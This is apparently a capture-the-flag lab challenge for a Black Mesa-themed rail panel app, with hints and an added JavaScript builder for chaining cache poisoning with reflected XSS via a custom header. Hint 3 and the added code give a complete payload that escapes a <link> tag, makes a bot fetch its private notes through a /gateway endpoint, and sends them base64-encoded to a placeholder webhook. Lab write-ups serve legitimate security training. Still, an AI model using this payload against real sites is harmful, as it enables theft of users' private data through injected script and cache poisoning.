MesaNet is a Black Mesa Transit rail broadcast panel running on Bugforge's lab infrastructure. The application caches API responses and reflects a custom header value directly into HTML, creating a chained attack path: poison the cache with a script injected via a custom header, then trick a bot into viewing the poisoned page — causing it to exfiltrate its private notes (and the flag) to an attacker-controlled webhook.
Objective: Build a complete payload that breaks out of the <link> tag context and executes JavaScript, which uses fetch() to POST for the bot's private notes and then exfiltrates the response to your webhook.
Context: The <link> tag in the HTML looks like: <link rel='stylesheet' href='/public/css/rail-SKIN.css'>. You need to close the href value and the tag, then inject a script that: (1) sends a POST request to /gateway whose body targets /api/notes/lists, and (2) forwards the response to your webhook. Write the double quotes in the JSON body as \x22 (the JavaScript hex escape for ") rather than as literal or backslash-escaped quotes, so the quoting does not break the JSON parser in the injected context.
Hint 1: Think about what string sequence closes a <link> tag from inside an href attribute, and what you can inject immediately after it to run JavaScript.
Hint 2: You need to break out of the href value and close the <link> tag first (e.g., with /css/default.css">, using whichever quote character the served page actually puts around href), then add a <script> block or inline event handler that calls fetch() on the /gateway endpoint and forwards the result to your webhook.
Hint 3: Send the header X-Rail-Skin: /css/default.css"><script>fetch('/gateway',{method:'POST',headers:{'Content-Type':'application/json'},body:'{\x22endpoint\x22:\x22/api/notes/lists\x22}',mode:'no-cors'}).then(r=>r.text()).then(d=>fetch('https://YOUR_WEBHOOK/?d='+btoa(d)))</script> with YOUR_WEBHOOK replaced by your own endpoint. \x22 is the JavaScript hex escape for a double quote: the browser decodes the body to {"endpoint":"/api/notes/lists"} at runtime, while the header value you send contains no literal double quotes other than the one that closes href.
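As an added example (not part of the original hints or of the MesaNet challenge code), the following JavaScript builds the X-Rail-Skin header value from the endpoint and webhook, simulates the server reflecting it into the <link> template, and checks the two quoting constraints the hints rely on: the payload carries exactly one literal double quote (the one closing href), and the \x22-escaped body decodes to valid JSON once the browser evaluates the string literal. Assumptions not taken from the page: the template is reproduced here with double quotes around href to match the `">` in Hint 3 (the served page may use single quotes, in which case the closing character must change), the /gateway body shape is taken from Hint 3 as {"endpoint": ...}, and the base64 is wrapped in encodeURIComponent() so that + and = in the exfiltrated value survive the query string.

```javascript
// Added example for the MesaNet cache-poisoning + XSS chain. Not from the challenge.
// Assumption: the server substitutes the X-Rail-Skin header verbatim for SKIN in this
// template; double quotes around href are assumed to match the `">` used in Hint 3.
const TEMPLATE = '<link rel="stylesheet" href="/public/css/rail-SKIN.css">';

// Serialize an object to JSON, writing every double quote as the JS hex escape \x22
// so the payload itself carries no literal quotes inside the single-quoted body string.
function jsonWithHexQuotes(obj) {
  return JSON.stringify(obj).replace(/"/g, '\\x22');
}

// Build the full X-Rail-Skin header value: close href and the <link> tag, then inject
// a script that POSTs to /gateway and forwards the response body to the webhook.
// Assumption (from Hint 3): /gateway accepts {"endpoint": "<path>"} as its JSON body.
function buildSkinPayload(endpoint, webhook) {
  const body = jsonWithHexQuotes({ endpoint });
  const js =
    "fetch('/gateway',{method:'POST',headers:{'Content-Type':'application/json'}," +
    "body:'" + body + "'})" +
    ".then(r=>r.text())" +
    // encodeURIComponent is an addition here: raw btoa() output contains + / = which
    // many query-string decoders mangle.
    ".then(d=>fetch('" + webhook + "?d='+encodeURIComponent(btoa(d))))";
  return '/css/default.css"><script>' + js + '</script>';
}

// Simulate the vulnerable reflection the page describes (constructed, not the real server).
function renderSkin(skin) {
  return TEMPLATE.replace('SKIN', skin);
}

// Decode the \xHH escapes of a JS string literal the way the engine would at runtime,
// to confirm the body the server receives is the intended JSON.
function decodeJsStringLiteral(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Number of literal double quotes in a string; the payload should contain exactly one.
function countLiteralDoubleQuotes(s) {
  return (s.match(/"/g) || []).length;
}

// Usage: inspect what the poisoned page would look like.
const payload = buildSkinPayload('/api/notes/lists', 'https://YOUR_WEBHOOK/');
console.log(payload);
console.log(renderSkin(payload));
```

The rendered output shows why the breakout works: the reflected value ends the real href early, the injected script runs, and the leftover `.css">` from the template is rendered as harmless text. Before sending the header to the real target, compare the quoting in the served HTML against the template assumed here.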